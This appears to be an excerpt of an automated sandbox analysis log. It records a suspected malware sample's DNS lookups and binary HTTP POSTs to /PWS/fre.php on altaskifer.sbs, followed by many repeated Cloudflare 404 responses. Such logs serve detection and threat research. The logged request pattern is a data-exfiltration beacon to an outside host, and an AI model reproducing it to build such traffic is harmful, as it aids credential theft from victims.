                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00404ED4 recv,4_2_00404ED4
                          Source: unknownDNS traffic detected: queries for: altaskifer.sbs
                          Source: unknownHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ird%2BWHDZUtWVyC2%2FncP0yIxShO0qw3mvApHkRlJoExlp2h6OdyGyH8Y45xjU9%2FyHKXY%2BJ6UZsiXshhKDXzn8iibK47PsSNZerky5nlG9uw44paW1wpZoKbbruqes%2BSGxwA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700110e4a1667ec-MIAalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bheu0mag0aVlTdqa%2B2whCGLclexLUE8fh7vPYv5c9hpJv30kJvKijhZXHSCSTW3%2Bc9XQ3otgdN8STBr1J5y1cduUCbrylZtVdD5BZup4S2EhuAEKtzOO0LpnJwkxUby9Iw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001112aa860979-MIAalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tq5XK46q7SRjYFRcPZZfGKtcPIpBiLMJK4WjuAiH%2BL6Qev21ON07KL1P%2FnuNAOOFphYcTf%2FcinjsfdXVkPhgaPs2l03ihy5KeVBd2oVOyBooPop7xmnEGjFHscBB2WOilA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011172fae7418-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQlf5%2FacuzMTkhNJgzGLZhnCDuGZmEryVICVmz8xDF2ym%2BMi4i7DOkuSoaCgT74FoHB6xKgbwl8rtWhhz7ialFEoMikReHzqGOJ9%2BC8VZ5c0je%2Fuz1iaXknZeIzeSMrHEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700111bf94031de-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONA6rX4dIjq0FRHXmN2kZ2ccbZE0DrIAdlgCB4hb9%2BhB5awqiHVQdw0zJ9gYMvjjpyVI6dId2b2qCQUbpsYS0%2F%2FYCIGRzKVvpGciEWNfUjS76H1RteYAGfMg13Fg4FEjNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001120dc640a3a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9i5I%2BracQCcxDtbpzUbdOiX6%2FwkWRPKLgdxykSAcPP5CjaxHsaHVZa1YDUJdptqhRfzPfxD%2FaFi0C%2BHMPSfZZ9JzwAhWYF5c8%2BpL4YG4aOVdNDz7lHnufK8iWqkzyj16%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001125c8cb9acc-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUmyiwEd2zpFZsUAyI2ESZOLJ3RoFI7xRP1ztasVJ5FQvs81KArTtNXS6KS2kmknhMM%2B%2FV8n0kB5ECzTTsMO%2B52kW2Eg2Bts85aNV8XIq2p8Hvwfs1kLIeu%2BCoD1wV4lyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700112acc7d746d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfO5XLLVxWaNiZKsnR3N%2Bzt1JjZxCOKWjjtU00rPBkBavNUBwoMEFYq5md3Y%2FvsYKJgxzqV6u41vqHNPK1NmzL5KJoI9FP%2FlMNbgYk7sZz9olEJB0kpeRdnKBLJDJEQreg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700112f9d543716-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMZnBkdceyFE2b24b%2BfYVFN6ykyVZABVUSCTOE5OIzeiw%2FNdCqW63u01LzCdepKlTKvXU9cfx%2B5f8ttgfMJfgJQz30osK1oYB8ONphvfv%2F4kakHTSmGASlFA2%2BkOldEypg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011347f8e336a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Ao6YPXXkWHvRESy3tdUirn6gNtrA5tNz359v%2FbNuuJIqYSZNZBCRfEqElWXbxfy5EIdXxKd9qdvm2pyJM3OWFQ%2BE%2BcBB66MOQI3zQFRJQCy5v3iYgmyilEc5%2B5b6bMWqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700113b0e78a560-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vj57YDwUvjiFWtx7WNXCXL6I2aHdsAEO%2FUtJ0efrycQINbWbAOAVxIbRPWjkUiBFM4kHzP0J%2FRxvu4zA8I%2B49Hi5O6aDGx3JQ9WWvlg8OGsPDx%2BKjXGIizHKzvQLx1%2BIw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011477836dad5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpcO4e2MmBG8j6ozX8bgTowbyzV5rECbGdYseCZ6Zkq%2BF77mx9p%2B1VWaSNglSIxEe7ThtaBYDTnYt%2BDZoUbO0Hd1GnVJl9EjR4S6%2B00CE9pb1DTZyeD00OUfac5tYzVmpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700114c686b9acb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZAAR69kvm8pG%2BzEIMCKOWZWQtij1b1yDdUxNreY8JpoB5zd0hv08VnYUMWkxYGqGYvhOjN6GdyQcicEN2o5S3Rf6%2FVERPIR0iiGXUpYMWNA%2BXTiwvx4f%2FVUT8mjC%2Fh4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011514e04a4f4-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx6YIKEpJ2IyF45rEKr%2BVGrtTVGOXmSpMrhrPhzQKwOUkQfIoTREnWAvJssubCQw9AwhJtlt2xNO6mTQRn%2Fl%2BV1J94m0ZZhWX0cgML1ZS1SBKRnWtxMAWcSTBEuI2xCBgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011568bc831e6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCAAOS1pSnGhzyPQRn5rHK9nAzs9RSoknv67Z4pmfqeXP11pEi31W0UsP%2BtA6QOIffEWbhNl3HgXQmdeSnvzTeN%2F5ln%2BWkCrnQDzXghK%2FW3FjZqruM2rnsHpMe1OSJkivg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700115b7d46a569-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXhtAyGeRIx8GsNU2BQ6IwXoQi7BerEUnab%2BGEd6cNL4sDv%2B02StVEc12eA2Prp%2BEUb7P6aIgUMxZUKRUJTQceN0JC0Yy%2FKuItRKaH6YGfXtMFTufL9eac5VXAoEHoVEJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116048bb31fb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEV7kfho2DE7dnxvYx8F6ESdhQ4g3ROHp6CzmI0n%2FIRBx%2FW7NZW76sFvw3AIodXS3zdzWEYNt7XIxZ4QBJFvIbwRNTOVO%2FCMJw2GypTFLRf3va2%2Fo%2FTq05Ib5VU8s7Oew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116528058dfd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbwoXtrwjnbLLJh2mjQBP3L8Q%2FQ9pjSWpMWyDobn%2B6qrh94YlzTJBUvJuDzv%2FBu5n0SlZu6MtQm4jHQlkpMY4WUI7K3%2FFLTJV5lO%2Fko%2BHberpdORawHw4Kml3Xjpz2codg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001169ee4209ae-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDoZIGymzIO5AiUbLpndDKq51%2B%2BU1SHXZHfvIcgKLLtOHE%2BfBNBZLtEbGRHTrrX9Bxs%2B3E8%2FMWTejOaeQIGEUpn2Kl6Vp0ug4o4orN1Z%2FRQTriavg6wbcA8rXNAZvAP%2BXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116ecddc571e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axEIlhmqw5LyDyYO4mpyOKLAP4kkPBuPq0PWlxSgX0Y71PS1LzKT2jSVbWRxkOzDVStzjzYt8XSqka7N0Zz8w18cT6PjX9FfxWeUj9DYIM4%2BQ4lCBC0gLayfrmoHtPdozQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011738d7721e7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLEeF4dvhsLMBGj7TPGkdWq0TkKrERdjiBM24LeQbyNWp8aMbcjqbrxgHU%2Fk1qXT76FOOpiBhn%2BMetIEsghpHcoJGwuXFhrLvYjRzTpAvtdVqL1w1SNp9OXSkLfOiyuPJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011785ba28dc7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9q%2FDE0bzkgkeri83BEpg28cjFqZIHWRB7yTUaZJhY8J%2F3mnOlupBFuWRZmvf4oG0DWiUaP2f9BPrbdd59Fx4kBAsEZI%2BT66Er%2BeJnojVOFrKNgsPuKlj%2FEauWgcxJerCNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700117d3d8e7428-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHtzMw8gqyd8ww1EK1BgwMNXzUJTGHFVAIS4yI4QX9upxi0Vv4op3VN1t207upcjUS3yzm5zUWQ00rJ%2BcdKmRpWy6QG1e3lpBoy5%2BnkGGt0VRKU4gJYiwt%2FtVOJC6ALoIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011823de431dd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvX843q7lulzsHsL78ZIETT0odUBFAq%2BajQIO5XuLZNpzUBkQy4gN4dfiNIwb0K8eKo0NhP3hrAFwy0tjE0suoqQtJrDJ9g8ww3Y%2BuNQgbPLTl%2BT%2FONafuml5w%2FQ9IM3vQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001186fc179ad2-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckbKu7yUVBSLi3epH5Ta25Kkmzmm6thGYGLYC6qL1H5gdY7OYA61onKL5dTE1%2B8ERio%2FO19RSmj95WnvMcUZ3TwAO9ql0L0ErwMu0jCZLqH3%2B6ujcNOZNukUlNZczV5L2Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700118beb403364-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdA0pcdPBW59ITYBSbOrJwETnAqWQPCO8%2FIn2wKamMM%2BZzbydoO1Cmw4WOHKQ2FvA8tqhuOyrDhez8xDMjI0zCvlGTzIMBR3ONyXzCPwexJj12Wm%2F2qnmXJ7tw2RGK9fCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001190cdeb3352-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZfQRUrB2SdT1eLJyZbio7KvUrEiavKy6urIyN8%2B5G3P7sde62aoet1UR%2BYMfBvosLW0RYLoyF1G78C%2F2InL2kYsYst4Kfxd%2FEI%2FUTIjSRbE4P9zSRqZ4NE9pp34fpTqNDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001195aecda512-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WoTy8CytH6FCGJ02FnvnJQaOiLpecp8e28%2ByX1uRiZ4CSBTOCeaW6ZaVGSgaHxFmcxS7lBIQM8gyYJwoov7ksoTD86qCD9xFptaRmKV2l7GNItYd6wSvF1VnZUyXdf2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700119a8a67259a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0XodsU6cTpRgul%2BX7ABl17NCZf%2B2hOOH6toQ7msxzgWFuWswfOGEMqSD53AbJakF%2F3rJYxejlf2BPbI8geSPJZX4lnqL05P%2FcNIFJ%2FjADLCVtqXiNeMJggRv6YzGwfRiHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700119f8cfe21b5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU6XjyB3%2FNRhFBAew165kUx%2B1dACg6uaxbUHhHekBPp4GbNiULy0hq7LyatbVe3K7%2BD5opbbHmzIhAHb7fOgRDlWs%2FaqjJ7G6hNRVmNvpxZ04odVQ7zWC%2BEiFwBW5gPUgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011a4882c5f20-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q63pSfh%2BvejxmCMXLjq0feEjlXe1RY11XvfTfG4xIeMQNPbKAYgakjNORoVfP2RRr2OI6%2FEl4y%2FhgKpIawLCwTRd44XySgK%2BVSCkS1BC8ske%2B%2Bu5I8qFai4yiCazp3UWyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011b6ecd5a56c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
